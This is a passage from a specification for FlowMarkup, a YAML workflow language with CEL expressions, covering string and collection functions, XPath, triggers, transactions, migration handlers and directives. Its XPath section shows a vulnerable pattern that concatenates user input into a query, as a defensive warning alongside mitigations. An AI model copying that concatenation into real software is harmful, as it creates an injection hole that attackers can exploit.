| `meta` | macro | `meta(variable)` returns metadata MAP for a typed variable. Keys: `type`, `kind`, `name`, `size` (RESOURCES only), `value` (RESOURCES only). For `SECRET.*` bindings: returns `{type: null, kind: <$kind>, name: null, readonly: true}`; `value` and `size` are always `null`. When `meta()` is called on a `SECRET.*` binding, the `name` field MUST be redacted — the engine MUST return `null` for the `name` field to prevent secret alias enumeration. *(CWE-200)* |

Mode constants are both CEL variable bindings and enum string values. `=mode == PARALLEL` and `=mode == "PARALLEL"` are equivalent. The engine pre-binds each constant to its string value.

**Auto-stringification in concatenation:** Non-string values (numbers, booleans, null) with a string operand in `+` are auto-coerced. `SecretValue` is never coerced.

**Null semantics:** Property access (`.field`), method calls (`.size()`), and indexing (`[0]`) on `null` raise `ValidationError` — this follows standard CEL semantics. The auto-stringification exception above applies: `null` in `+` concatenation coerces to `"null"` string, but `null.field` in any context throws. For collections, `[].first()` returns `null` (safe), but `null.first()` throws (unsafe). Recommended null-safe patterns:

- Ternary: `=x != null ? x.field : fallback`
- `has()` macro: `=has(map.key)` for map field existence
- `condition:` guard: use `condition: =x != null` on the step, or wrap in a parent `if:`

#### String Methods

| Method | Returns | Description |
|---|---|---|
| `s.contains(sub)` | bool | Substring check |
| `s.startsWith(prefix)` | bool | Prefix check |
| `s.endsWith(suffix)` | bool | Suffix check |
| `s.matches(regex)` | bool | Regex match |
| `s.size()` | int | Length (`size()`, NOT `length()`) |
| `s.split(sep)` | list | Split by separator |
| `s.replace(old, new)` | string | Replace substring |
| `s.trim()` | string | Trim whitespace |
| `s.upperAscii()` | string | Uppercase |
| `s.lowerAscii()` | string | Lowercase |
| `s.indexOf(sub)` | int | Index of substring (-1 if absent) |
| `s.substring(start[, end])` | string | Substring extraction |

#### Collection Macros (Standard CEL)

| Macro | Description |
|---|---|
| `list.filter(x, pred)` | Elements where predicate is true |
| `list.map(x, expr)` | Transform each element |
| `list.exists(x, pred)` | True if any matches |
| `list.all(x, pred)` | True if all match |
| `list.exists_one(x, pred)` | True if exactly one matches |

#### FlowMarkup Collection Extensions

##### List Extensions

| Function | Kind | Description |
|---|---|---|
| `list.sortBy(x, expr)` | macro | Sort ascending by key |
| `list.sortByDesc(x, expr)` | macro | Sort descending by key |
| `list.flatMap(x, expr)` | macro | Map then flatten one level |
| `list.first()` | function | First element or null |
| `list.first(n)` | function | First n elements |
| `list.first(x, pred)` | macro | First matching element or null |
| `list.last()` / `list.last(n)` / `list.last(x, pred)` | mixed | Analogous to `first` |
| `list.skip(n)` | function | Skip first n elements |
| `list.distinct()` | function | Remove duplicates |
| `list.distinctBy(x, expr)` | macro | Remove duplicates by key |
| `list.flatten()` | function | Flatten one level |
| `list.reverse()` | function | Reverse order |
| `list.groupBy(x, expr)` | macro | Group into `{key: [items]}`. The group key expression MUST evaluate to a string. Non-string results are coerced to their string representation. |
| `list.reduce(acc, x, init, expr)` | macro | Left fold. Example: `=items.reduce(total, item, 0, total + item.amount)` — accumulates `amount` across all items starting from 0. |
| `list.chunk(n)` | function | Split into sub-lists |
| `list.zip(other)` | function | Pair elements |
| `list.indexOf(val)` | function | Index of first occurrence |
| `list.join(sep)` | function | Join with separator |
| `list.sum()` / `list.avg()` / `list.min()` / `list.max()` | function | Aggregation |
| `list.minBy(x, expr)` / `list.maxBy(x, expr)` | macro | Element with min/max key |
| `list.count(x, pred)` | macro | Count matching elements |

**Empty collection semantics:** `[].first()` -> `null`, `[].sum()` -> `0`, `[].min()` -> `null`, `[].avg()` -> `null`.

##### Map Extensions

| Function | Kind | Description |
|---|---|---|
| `map.keys()` / `map.values()` / `map.entries()` | function | Key/value/entry access |
| `map.merge(other)` | function | Merge (right wins) |
| `map.filterKeys(k, pred)` / `map.filterValues(v, pred)` | macro | Filter entries |
| `map.mapValues(v, expr)` | macro | Transform values |

##### Utility Functions

| Function | Description |
|---|---|
| `range(n)` / `range(start, end)` | Generate integer list |

#### Encoding, Decoding, and Parsing Functions

| Function | Description |
|---|---|
| `bytes.encode(BASE64\|BASE64URL\|HEX)` | Bytes -> encoded string |
| `string.encode(UTF8\|UTF16*)` | String -> bytes |
| `value.encode(JSON\|YAML\|CSV\|TSV\|XML)` | Serialize value -> string. Result carries `$type` metadata matching the format: `CSV` → `text/csv`, `TSV` → `text/tab-separated-values`, `JSON` → `application/json`, `YAML` → `application/yaml`, `XML` → `application/xml`. This means the result can be used at binary-native boundaries (HTTP body, multipart, mail attachment) without specifying `contentType:` explicitly. |
| `string.decode(BASE64\|HEX\|JSON\|YAML\|CSV\|TSV\|XML)` | Encoded string -> value |
| `bytes.decode(UTF8\|UTF16*)` | Bytes -> string |

`value.parse(FORMAT)` is an alias for `value.decode(FORMAT)`.

Errors: `EncodeError`, `ParseError`.

**XML encode/decode constraints:**

- `encode(XML)` only accepts MAP input. ARRAY input raises `EncodeError` (XML requires a root element). The MAP must have exactly one top-level key (the root element name). Zero or multiple keys raise `EncodeError`. Produces an XML string with `<?xml version="1.0" encoding="UTF-8"?>` declaration.

  ```yaml
  # Valid — one top-level key:
  - set: { xml: ={order: {id: "123", total: 99.99}}.encode(XML) }

  # EncodeError — two top-level keys (wrap in a root element):
  # ={id: "123", total: 99.99}.encode(XML)
  # Fix: ={order: {id: "123", total: 99.99}}.encode(XML)
  ```
- `decode(XML)` / `parse(XML)` parses XML string into MAP using the XML-to-MAP mapping convention (§1.3). All element text values are STRING (no number/boolean coercion). Malformed XML raises `ParseError`.

The XML-to-MAP mapping convention (§1.3) governs all XML decoding contexts: `decode(XML)`, `parse(XML)`, `parseAs: XML` (exec/ssh/request/storage), and RESOURCES `.xml` loading.

#### XPath Functions

Two CEL functions for querying raw XML strings (not parsed MAPs — XPath is native to XML's DOM):

| Function | Returns | Description |
|---|---|---|
| `string.xpath(expr)` | first match | STRING for text/attribute nodes, MAP for element nodes (same mapping convention), NUMBER/BOOLEAN for XPath results. `null` if no match. |
| `string.xpathAll(expr)` | ARRAY | All matches. Empty `[]` if none. |
| `xpathParam(expr, bindings)` | STRING | Safe parameterized XPath. For each `{key: value}` in `bindings`, replaces `$key` in `expr` with a safely escaped XPath string literal. Escaping strategy: no quotes → single quotes; contains `'` → double quotes; contains both → `concat()` segments. |

XPath 1.0 (widely supported across languages — e.g., `javax.xml.xpath` in Java, `lxml` in Python, `xmldom`/`xpath` in JavaScript, `System.Xml.XPath` in C#).

Errors: `XPathError` (invalid expression), `ParseError` (malformed XML).

**Two access paths for XML data:** Users choose between: (A) `decode(XML)` for structured MAP access via dot notation (fast, simple, but loses XPath), or (B) keep as TEXT/STRING and use `xpath()`/`xpathAll()` for XPath queries (powerful, but requires string variable).

**Usage example:**
```yaml
vars:
  xml_response:
    $kind: TEXT
    $value: =RESULT.body
- set:
    order_id: "=xml_response.xpath('/order/@id')"
    item_names: "=xml_response.xpathAll('//item/text()')"
    first_item: "=xml_response.xpath('//item[1]')"
```

```yaml
# Safe XPath with user input — prevents XPath injection (CWE-643)
- set:
    user_node: "=xml_data.xpathParam('//user[@id=$id and @role=$role]', {'id': input.user_id, 'role': input.role})"
    # Produces: //user[@id='alice' and @role='admin']
```

**XPath injection (CWE-643):** XPath expressions constructed from user input are vulnerable to injection. Example: `xpath: ="//user[@id='" + user_input + "']"` allows an attacker to break out of the string literal and access arbitrary nodes. **This is a critical security concern** — XPath 1.0 has no parameterized query API and no safe general-purpose escaping for string literals. Mitigation: validate `user_input` against a strict allowlist (e.g., `=user_input.matches('^[a-zA-Z0-9_-]+$')`) before incorporating into XPath expressions. SA-XML-3 (WARN) flags XPath expressions that incorporate user-controlled input. When processing user-influenced queries, flow authors MUST prefer `decode(XML)` with MAP access over `xpath()`. When XPath is required with user-controlled values, flow authors MUST use `xpathParam()` for safe escaping.

#### Number Formatting Functions

| Function | Returns | Description |
|---|---|---|
| `number.toFixed(n)` | string | Format number with exactly `n` decimal places (half-up rounding). Example: `(3.14159).toFixed(2)` -> `"3.14"` |
| `number.round(n)` | number | Round number to `n` decimal places (half-up rounding). Example: `(3.14159).round(2)` -> `3.14` |

`toFixed(n)` returns a string for display purposes (like JavaScript's `Number.prototype.toFixed`). `round(n)` returns a number for further computation. `n` must be a non-negative integer (>= 0); negative values are a runtime error. `round(0)` rounds to an integer but remains a NUMBER (not converted to INTEGER).

#### `version()` CEL Function

`version(str)` parses a version string into a `Version` value supporting comparison operators.

**Properties:**

| Property | Type | Description |
|---|---|---|
| `.major` | integer | Major version component |
| `.minor` | integer | Minor version component |
| `.patch` | integer | Patch version component |
| `.build` | string | Build metadata string (e.g., `"20260315"` from `1.2.3+20260315`) |
| `.revision` | string | VCS revision identifier (e.g., commit SHA) |
| `.pre_release` | string | Pre-release label (e.g., `"beta.1"` from `1.2.3-beta.1`) |
| `.build_metadata` | string | Full build metadata string (alias for `.build`) |
| `.snapshot` | boolean | `true` if version is a snapshot/pre-release (i.e., `.pre_release` is non-empty) |
| `.segments` | list(integer) | List of integer version components (e.g., `[1, 2, 3]` from `"1.2.3"`) |
| `.raw` | string | Original unparsed version string |

`isValidVersion(str)` returns `true` if parseable. Invalid strings produce `VersionParseError`.

> **Warning:** `VersionParseError` is non-catchable (see FLOWMARKUP-ERRORS.md). When `version()` receives external input, always validate with `isValidVersion(str)` first. For defense-in-depth with mutable sources, validate immediately before calling `version()` in the same expression: `=isValidVersion(v) ? version(v) : fallback`.

#### Random and UUID Functions

| Function | Returns | Description |
|---|---|---|
| `uuid()` | string | Generate a UUID v4 string (e.g., `"550e8400-e29b-41d4-a716-446655440000"`). |
| `random()` | number | Generate a random decimal in `[0.0, 1.0)`. |
| `random(min, max)` | integer | Generate a random integer in `[min, max]` (both inclusive). Example: `random(1, 4)` returns `1`, `2`, `3`, or `4`. `min` and `max` MUST be integers; `min` MUST be less than or equal to `max`. |
| `now()` | `google.protobuf.Timestamp` | Returns the current UTC timestamp at the time of evaluation. **Non-deterministic** — SA-IDEMP-1 flags usage in idempotency keys. Not suitable for reproducible computations. |

All functions MUST use a CSPRNG (cryptographically secure pseudorandom number generator). **Idempotency impact:** Flows using `uuid()`, `random()`, or `random(min, max)` in `idempotencyKey` defeat deduplication — SA-IDEMP-1 (ERROR) rejects non-deterministic functions in idempotency keys. These functions also affect replay determinism. Engines MUST record non-deterministic function results (`uuid()`, `random()`, `random(min, max)`, `now()`) in the execution trace/checkpoint. On replay, engines MUST replay recorded values rather than re-evaluating, preserving determinism for audit and debugging purposes.

#### 2.7.1 User-Defined Functions

```yaml
functions:
  normalize:
    params: [value]
    body: "=value.trim().lowerAscii().replace('-', '_')"

  clamp:
    params:
      val: { $kind: NUMBER }
      minVal: { $kind: NUMBER }
      maxVal: { $kind: NUMBER }
    body: "=val < minVal ? minVal : (val > maxVal ? maxVal : val)"
```

| Rule | Detail |
|---|---|
| `body:` prefix | `=` prefix REQUIRED (SA-QUOTE-1) |
| No recursion | SA-FN-2 (self), SA-FN-3 (cycle) |
| Scope | Flow-local only |
| Naming | `^[a-z][a-zA-Z0-9_]*$` |
| Purity | Read-only by CEL design |
| Chaining | May call other functions in same block |
| Shadowing | User definition wins over built-in (SA-FN-1 warn) |
| Arity check | SA-FN-6 |

**String output size limit.** CEL expression evaluation MUST enforce a maximum output string size (default: 1 MB, configurable). Expressions that produce strings exceeding this limit MUST fail with an error rather than consuming unbounded memory. This applies to string concatenation, `string.join()`, format functions, and template expansion. The configurable maximum is 10 MB. If a CEL expression produces a string exceeding this limit (e.g., through repeated concatenation, `string.repeat()`, or `join()` on large collections), the engine MUST abort evaluation and raise a `ResourceLimitError`. This limit applies to intermediate string values during expression evaluation, not just the final result. *(CWE-400: Uncontrolled Resource Consumption)*

**CEL intermediate value memory limit.** The engine MUST enforce a configurable per-expression memory limit for intermediate CEL values including MAP, ARRAY, and nested structures (default: 10 MB, configurable maximum: 100 MB). `list.reduce()`, `list.map()`, `list.filter()`, and other collection macros MUST count toward this limit. Exceeding raises `ResourceExhaustedError`. *(CWE-400)*

### 2.8 Triggers

```yaml
triggers:
  - event: order_submitted
    condition: "=EVENT.DATA.priority == 'rush'"
  - cron: "0 9 * * MON-FRI"
  - schedule: "every 5m"
```

| Type | Description |
|---|---|
| `event:` | Static event type. Optional `condition:` filter with `EVENT.DATA.*`. |
| `cron:` | 5-field cron expression. |
| `schedule:` | Human-readable interval or time. |

**Trigger overlap behavior.** When a trigger fires while a previous invocation is still running, the behavior depends on the `concurrency:` property:

| `concurrency:` | Behavior |
|---|---|
| `ALLOW` (default) | New instance starts immediately. No limit on concurrent instances. |
| `SKIP` | Trigger is silently dropped if an instance is already running. |
| `QUEUE` | Trigger is queued; starts when the running instance completes. Maximum queue depth: `maxQueued` (default: 10). |
| `REPLACE` | Running instance is cancelled; new instance starts. Cancelled instance receives `CancellationError`. |

The engine MUST enforce a configurable maximum concurrent instances per trigger (default: 100). Exceeding the limit MUST raise `ResourceExhaustedError`. *(CWE-400)*

Event data maps to `input:` by name. `EVENT` is a reserved variable name.

### 2.9 Event Contracts (`events:`)

Each entry is an `eventDeclaration` with `_notes_:` and `data:` (paramContract). Event names follow `snake_case`. All SA-EVENT rules are gated on `events:` being present. Cross-flow verification is out of scope.

**Event capability gating:** Flows that emit or listen for GLOBAL-scope events MUST declare the event types in `events:` (SA-EVENT-9, ERROR). This prevents unauthorized flows from injecting events into the global event bus or eavesdropping on events intended for other flows. LOCAL-scope events do not require declaration. CONTEXT-scope events SHOULD be declared in `events:` (SA-EVENT-10, WARN) — undeclared CONTEXT-scope `emit`/`waitFor` may allow sub-flows with CONTEXT access to eavesdrop on parent coordination events.

Flows with security-sensitive capabilities (`SECRET`, `EXEC`, `SSH`, `STORAGE`) MUST declare all CONTEXT-scope event types they emit or wait for. Undeclared CONTEXT events in security-sensitive flows are rejected by SA-EVENT-10 (ERROR) to prevent event eavesdropping attacks.

---

### 2.10 Rollback and Transaction Groups

#### Root-Level Transaction (Implicit Group)

When `transaction:`, `onRollbackError:`, or `locking:` are set at the `flowmarkup:` root, the engine wraps the entire `do:` list in an implicit sequential `group:` with those properties. This avoids the boilerplate of an outer `group:` when the whole flow is one transaction:

```yaml
# Equivalent — root-level shorthand
flowmarkup:
  transaction: true
  onRollbackError: CONTINUE
  do:
  - call: { service: payment, operation: charge, ... }
  - call: { service: ledger, operation: record, ... }

# Equivalent — explicit group
flowmarkup:
  do:
  - group:
      transaction: true
      onRollbackError: CONTINUE
      do:
      - call: { service: payment, operation: charge, ... }
      - call: { service: ledger, operation: record, ... }
```

`catch:` and `finally:` at the flow root execute outside the implicit group (after rollback handlers, as usual).

#### `transaction: true` on `group`

| Property | Type | Description |
|---|---|---|
| `transaction` | boolean or string | `true` = fork all scopes; `"GLOBAL"`/`"CONTEXT"`/`"LOCAL"` = fork named scope only |
| `onRollbackError` | string | `CONTINUE` (default) or `FAIL` |
| `locking` | string | `PESSIMISTIC` (default) or `OPTIMISTIC` |

**Mechanism:**
- On entry: fork variable scopes (isolated working copy)
- All writes go to the fork
- Success: fork committed atomically
- Error: fork discarded (after rollback handlers complete)
- `emit` inside transaction groups is buffered until commit
- `log` is NOT buffered

#### Isolation Guarantees

##### Per-Step Atomicity (Read Committed) -- Always Applies

1. **Snapshot read:** All CEL expressions within a single step evaluate against the same point-in-time snapshot.
2. **Atomic write:** All variable writes from a single step become visible atomically.
3. **Read-modify-write safety (`set`):** When a `set` step reads and writes shared variables, the engine MUST ensure serialized execution (transparent OCC retry). Per-step OCC does NOT apply inside `transaction: true` groups — the transaction group provides its own serializable isolation (see "Transaction Group Isolation" below), which subsumes the per-step guarantee.

##### Transaction Group Isolation (Serializable -- MUST)

1. **Stable reads** within the group
2. **Buffered writes** invisible to others until commit
3. **Serializable guarantee (MUST):** Result of concurrent transaction groups MUST be equivalent to some serial order. If not achievable, engine MUST raise `ConflictError`.
4. **Atomic commit/rollback**

**`locking: PESSIMISTIC`** (default): Per-variable locks acquired at entry. `ConflictError` never occurs.

**`locking: OPTIMISTIC`**: Snapshot-based. `ConflictError` possible at commit if concurrent modification detected.

| Anomaly | Per-step only | Transaction group |
|---|---|---|
| Dirty read | Prevented | Prevented |
| Non-repeatable read | Possible between steps | **Prevented** |
| Lost update | Prevented (single `set`); possible across steps | **Prevented** |
| Write skew | N/A | **Prevented** |

##### Error Types

- **`ConflictError`** -- at commit time (`OPTIMISTIC`) or OCC retry exhaustion. Properties: `ERROR.DATA.variables`, `ERROR.DATA.source`.
- **`DeadlockError`** -- cycle in lock wait-for graph. Properties: `ERROR.DATA.locks`.

##### Interaction with `lock`

| Construct | Isolation | ConflictError? |
|---|---|---|
| No lock, no transaction | Per-step Read Committed only | No |
| `lock EXCLUSIVE` | Serializable (single holder), no rollback | No |
| `transaction: true` | Serializable + rollback | Only with OPTIMISTIC |
| Both | Serializable + rollback. SA-ROLLBACK-3 warns (redundant for GLOBAL/CONTEXT) | No |

##### Nested Transactions

Inner `transaction: true` creates a nested buffer. Inner commit merges into outer buffer. Inner rollback discards inner buffer. Inner group inherits outer's locking mode (SA-ISO-7 warns if inner declares different mode). The engine MUST enforce a configurable maximum nesting depth (default: 10, maximum: 100). Exceeding raises `ResourceExhaustedError`. When a transaction group completes (commit or rollback), its forked scope MUST be immediately released. The engine MUST account fork memory against the per-instance memory limit — each active fork's modified variables count toward the total.

##### Scope-Specific Fork

`transaction: "GLOBAL"` forks only that scope. Non-forked scope writes are immediate and NOT rolled back (SA-ISO-8 warns). When `mode: PARALLEL` and `transaction: true`, each parallel branch operates on its own fork of all scopes (including `GLOBAL.*`). Branches CANNOT see each other's uncommitted writes — each branch sees the snapshot taken at fork time. Writes are merged at commit in branch declaration order; conflicting writes from later branches overwrite earlier ones (last-writer-wins within the committed set).

##### `return` Inside Transaction Group

Commits the fork. With `OPTIMISTIC`, `ConflictError` -> rollback handlers fire, fork discarded, `RolledBackError` propagates (SA-CONC-5 warns).

#### `rollback:` on Action Steps

- Placement: action steps only
- When action completes successfully, rollback handler pushed onto per-scope stack
- On unhandled error past scope boundary: handlers fire in reverse completion order
- Handlers execute with fork still live (before discard)
- `rollback:` body is a `stepList`

#### Error Types

| Error | Condition |
|---|---|
| `RolledBackError` | All rollback handlers succeeded |
| `RollbackFailedError` | One or more handlers failed; `ERROR.DATA.succeeded` (list of `_id_`s) and `ERROR.DATA.failed` (list of `_id_`s) |

#### Ordering: rollback, catch, finally

(1) Rollback handlers in reverse order -> (2) fork discarded -> (3) error wrapped as `RolledBackError`/`RollbackFailedError` -> (4) `catch:` -> (5) `finally:`.

Static analysis: SA-ROLLBACK rules apply.

---

### 2.11 `onVersionChange` -- Migration Handler

Flow-level lifecycle hook (not a directive). Runs during checkpoint resume when flow content has changed.

```yaml
onVersionChange:
  - log: "='Migrating from v' + MIGRATION.OLD_VERSION"
  # Path 1: return — gracefully terminate incompatible instances
  - if:
      condition: =MIGRATION.OLD_VERSION < 2
      then:
        - log: "='v' + MIGRATION.OLD_VERSION + ' too old — terminating instance'"
        - return: {status: terminated, reason: incompatible_version}
  # Path 2: throw — error, preserve checkpoint for retry
  - if:
      condition: =MIGRATION.OLD_VERSION == 2 && !has(user_email)
      then:
        - throw: { error: MigrationError, message: "v2 checkpoint missing required user_email" }
  # Path 3: complete normally — resume with new version (v2→v3 migration)
  - if:
      condition: =has(user_email)
      then:
        set: { customer_email: =user_email }
```

**`MIGRATION` CEL binding** (available inside `onVersionChange:` only):

| Binding | Type | Description |
|---|---|---|
| `MIGRATION.OLD_VERSION` | integer | `version:` from checkpoint (defaults to `1` when not specified) |
| `MIGRATION.NEW_VERSION` | integer | `version:` from new flow (defaults to `1` when not specified) |
| `MIGRATION.OLD_HASH` | string | Content hash of old flow |
| `MIGRATION.NEW_HASH` | string | Content hash of new flow |
| `MIGRATION.LOCATION` | string | Canonical flow location |
| `MIGRATION.STEP_CURSOR` | string | Checkpoint step cursor |
| `MIGRATION.CHECKPOINTED_AT` | timestamp | When checkpoint was taken |

**Version default:** When `version:` is omitted, it defaults to `1`. `MIGRATION.OLD_VERSION` and `MIGRATION.NEW_VERSION` are therefore always integers, never null.

**Forbidden:** `wait`/`waitFor`/`waitUntil` (SA-VER-3), `async: true` (SA-VER-4), `yield` (SA-VER-5).

**Error types:** `MigrationError` (non-catchable), `FlowVersionError` (when `onVersionChange:` absent).

**Handler outcomes:**

1. **Completes normally** — resume flow instance with new version. Checkpoint variables reflect handler modifications.
2. **Executes `return`** — gracefully terminate the flow instance. `finally:` still runs. Checkpoint is discarded (instance is done). Return value (if any) becomes the flow's output and MUST conform to the `output:` contract.
3. **Throws** — wrapped as `MigrationError` (non-catchable). Checkpoint preserved for retry.

Handlers SHOULD be idempotent. Checkpoint preserved on error for retry.

**Audit requirements:** The engine MUST audit-log all variable modifications performed by `onVersionChange:` handlers, including before/after value hashes. The engine MUST log the old FlowRef, new FlowRef, and deployer identity. See [FLOWMARKUP-ENGINE.md](FLOWMARKUP-ENGINE.md) §5.7 audit events.

> **Migration handler restrictions.** Migration handlers MUST NOT write to `GLOBAL.*` or `CONTEXT.*` scopes. Migration handlers MUST NOT modify variables annotated with `$secret: true`. Static analysis rule SA-VER-6 (ERROR) MUST reject writes to shared scopes or secret-tagged variables in `onVersionChange:` handlers. *(CWE-269)*

> **Migration handler action restrictions.** Migration handlers MUST NOT execute `exec`, `ssh`, `request`, `mail`, `storage`, `call`, or `run` action steps. Migration handlers run during a sensitive lifecycle phase (checkpoint resume) where the flow's capabilities may differ between versions. Only `set:`, `log:`, `assert:`, `emit:`, control flow directives (`if`, `switch`, `forEach`), and `return`/`throw` are permitted. SA-VER-7 (ERROR) MUST reject action steps other than `set:`, `log:`, `assert:`, `emit:`, and control flow directives inside `onVersionChange:` handlers. *(CWE-269)*

---

### 2.12 Deployment Security

The engine MUST authenticate flow deployment operations. Anonymous flow deployment MUST be denied by default. The engine MUST support capability provisioning policies that restrict which capabilities (`EXEC`, `SSH`, `SECRET`, `MAIL`, `STORAGE`, `REQUEST`) may be granted to flows deployed by a given identity. The engine MUST log all deployment operations to the audit log including: deployer identity, flow identifier, requested capabilities, deployment timestamp, and whether the deployment was accepted or rejected.

> **Capability provisioning.** The engine MUST maintain a configurable per-identity (or per-role) capability allowlist. A flow requesting capabilities not in the deployer's allowlist MUST be rejected at deployment time with `AccessDeniedError`. This prevents any single flow author from granting themselves arbitrary system access. Detailed deployment authorization models (RBAC, ABAC) are defined in [FLOWMARKUP-ENGINE.md](FLOWMARKUP-ENGINE.md) §5.8. *(CWE-269)*

---

## 3. Directives (Core + Shorthands: `parallel`, `race`, `logWarn`, `logError`)

**Step annotations:** `_label_`, `_notes_`, `_meta_`, `_id_` are available on all directives and actions.

**Single-step body unwrapping:** Wherever a step list is expected, a single step object MAY be provided directly without wrapping in a list.

**`condition:` pre-execution guard:** All directives and actions support an optional `condition:` pre-execution guard (CEL expression). When present and the expression evaluates to false, the step is skipped entirely (including `finally:` on `try:` — the step is not entered at all). Exceptions: `set:` (body keys are variable names; wrap in `if:` instead). For `if`/`while`/`assert`, `condition:` IS the directive's own condition. For `waitFor`, `condition:` is a post-receive filter.

### 3.1 `group`

Unified step group with three modes:

| Mode | Behavior |
|---|---|
| `SEQUENCE` (default) | Steps/branches run in order |
| `PARALLEL` | All branches run concurrently; all MUST complete |
| `RACE` | First branch to complete wins; others cancelled |

Cancellation in RACE mode is non-transactional: side effects from cancelled branches (API calls, database writes, emitted events) are NOT automatically rolled back. If compensation is needed, use `rollback:` handlers on action steps within the branches.

**Cancellation semantics.** RACE cancellation is cooperative: the engine checks for cancellation between steps. A step that is currently executing (e.g., waiting for an HTTP response) runs to completion before cancellation takes effect. `finally:` blocks in cancelled branches MUST execute. The engine MUST complete cancellation within a configurable grace period (default: 30 seconds). If a cancelled branch does not complete within the grace period, the engine MUST forcibly terminate it and log an ERROR-level audit event.

Static analysis rule SA-RACE-1 (WARN) MUST flag RACE branches containing side-effectful actions (`call`, `request`, `exec`, `ssh`, `mail`, `storage`, `emit`) without corresponding `rollback:` handlers.

**`failPolicy:`** (`PARALLEL`/`RACE` only):
- `FAST` (default): first error cancels all, error propagates
- `COMPLETE`: all branches run to completion; `GroupError` raised if any failed

**`branches:`** -- named branches with optional `condition:` (inclusive gateway) and `dependsOn:` (DAG dependencies). `do:` and `branches:` are mutually exclusive. `dependsOn:` is an array of branch name strings — the branch waits until all named dependencies complete before starting. Cycles in the dependency graph raise `ConfigurationError` at load time.

**`onTimeout:`** -- non-interrupting handler. Fires when `after:` elapses without cancelling execution. Handler runs as a concurrent branch — the group does not complete until both the primary execution and the handler have finished. SA-CONC-1 warns on variable conflicts between handler and primary execution.

> **Design rationale:** `onTimeout:` is deliberately non-interrupting — it is designed for notifications, escalation, and audit logging while the primary operation continues. Handlers SHOULD only perform side-effect-free operations (`log`, `emit`, `set` on independent variables). For interrupting timeout behavior that cancels the timed-out operation, use the step-level `timeout:` property instead.

**`defaults:`** -- scoped to the group, shadows outer defaults.

**`condition:`** -- optional pre-execution guard. When false, the entire group (including `finally:`) is skipped.

> **WARNING:** This also applies to `try:` blocks with `condition:`. When `condition:` is `false`, the entire `try` block is skipped, **including `finally:`**. This differs from programming languages where `finally` always runs after entering a try block. In FlowMarkup, `condition: false` means the step is never entered. If cleanup must run unconditionally, place it outside the `try` block or wrap the `condition:`-guarded `try` in an outer `try/finally`. SA-TRY-1 (WARN) flags `try` with `condition:` and `finally:` containing resource-cleanup steps.

**`transaction:`** and `rollback:` -- see [Rollback and Transaction Groups](#rollback-and-transaction-groups).

#### `parallel:` and `race:` Shorthands

`parallel:` and `race:` are syntactic sugar for `group:` with `mode: PARALLEL` or `mode: RACE`. Config keys (`timeout`, `failPolicy`, `defaults`, `transaction`, `onRollbackError`, `locking`, `onTimeout`, `condition`, `_id_`, `_label_`, `_notes_`, `_meta_`) are parsed as group options. All other keys are branch names.

> **Reserved branch names:** Branch names MUST NOT collide with config key names. SA-PARALLEL-2 (ERROR) rejects branches named `timeout`, `failPolicy`, `defaults`, `transaction`, `onRollbackError`, `locking`, `onTimeout`, `condition`, `_id_`, `_label_`, `_notes_`, or `_meta_`. To use a branch with such a name, use the full `group:` form with explicit `branches:`.

> **Reserved name stability.** The reserved branch name list (`timeout`, `failPolicy`, `defaults`, `transaction`, `onRollbackError`, `locking`, `onTimeout`, `condition`, `_id_`, `_label_`, `_notes_`, `_meta_`) is a closed set. This list MUST NOT be extended in minor or patch versions of the specification. Any new configuration keys introduced in future versions MUST use the full `group:` form with explicit `branches:` — they MUST NOT be added to the shorthand reserved list.

```yaml
# parallel: shorthand
- parallel:
    failPolicy: COMPLETE
    fedex:
    - call: { service: shipping, operation: quote, params: { carrier: fedex } }
    ups:
    - call: { service: shipping, operation: quote, params: { carrier: ups } }

# race: shorthand
- race:
    openai:
    - call: { service: openai, operation: complete, result: response }
    anthropic:
    - call: { service: anthropic, operation: complete, result: response }
```

**Desugaring:** `parallel: { X }` desugars to `group: { mode: PARALLEL, branches: { X minus config keys } }`. `race: { X }` desugars to `group: { mode: RACE, branches: { X minus config keys } }`.

**When to use full `group:` form:** dynamic mode (`mode: =expr`), SEQUENCE mode, or when explicit structure is preferred.

SA-PARALLEL-1 (ERROR): no branch names present (all keys are config keys).

### 3.2 `if`

```yaml
- if:
    condition: =score > 0.8
    then:
      - <step>
    elseIf:
      - condition: =score > 0.5
        then:
          - <step>
    else:
      - <step>
```

`elseIf:` is an array of `{ condition, then }` clauses evaluated top-to-bottom. First match wins.

### 3.3 `forEach`

```yaml
- forEach:
    items: =results              # CEL expression
    as: item                     # loop variable (snake_case); defaults to item if omitted
    index: i                     # optional 0-based index
    concurrent: true             # optional
    maxConcurrency: 10           # optional cap
    completionCondition: =success_count >= 3  # optional, concurrent only
    do:
      - <step>
```

- **`condition:`** -- optional pre-execution guard. When false, the loop is skipped entirely.
- Empty items: loop body does not execute. `null` items: `ValidationError`.
- **Default `as:`:** When `as:` is omitted, the loop variable defaults to `item` — consistent with `snake_case` convention for data element names (§1.6). Explicit `as:` still works and is recommended when the domain name improves readability.
- `as:` creates per-iteration isolated binding that shadows existing variables.
- In concurrent mode, `as:`/`index:` are per-iteration copies; other variables are shared (last-writer-wins). `completionCondition` is evaluated after each iteration completes (evaluation is serialized). When true, remaining in-flight iterations are cancelled and the loop exits. For safe accumulation in concurrent forEach, use `set:` with GLOBAL scope and `lock:`, or use `completionCondition` to collect results via the built-in `RESULTS` array.

**Memory model for concurrent `forEach`:** (1) Scalar variable writes are atomic (the entire value is replaced in one operation). (2) MAP and ARRAY writes replace the entire value atomically (no partial updates visible to other iterations). (3) "Last writer wins" is determined by wall-clock completion order; in the event of a tie, the iteration with the higher index wins. (4) SA-FOREACH-7 (WARN) flags concurrent `forEach` iterations that write to the same non-lock-protected variable.

- `onTimeout:` available (same semantics as `group`).

**Maximum iteration limit.** `forEach` MUST support a `maxItems` property (default: 10,000) that limits the number of iterations. If the input collection exceeds `maxItems`, the engine MUST raise a `ValidationError`. This prevents resource exhaustion from unbounded iteration over large or attacker-controlled collections. The `maxItems` property type is integer, minimum: 1, maximum: 1,000,000. If the `items` expression evaluates to a collection larger than `maxItems`, the engine MUST raise a `ResourceLimitError` and not begin iteration. When `maxItems` is not specified and the items collection exceeds the default limit, the engine MUST raise the error. Static analysis rule SA-FOREACH-3 MUST flag `forEach` steps where `maxItems` is not explicitly set and `items` references user-controlled input. *(CWE-770: Allocation of Resources Without Limits or Throttling)*

### 3.4 `while`

```yaml
- while:
    condition: =counter < max_retries
    do:
      - <step>
```

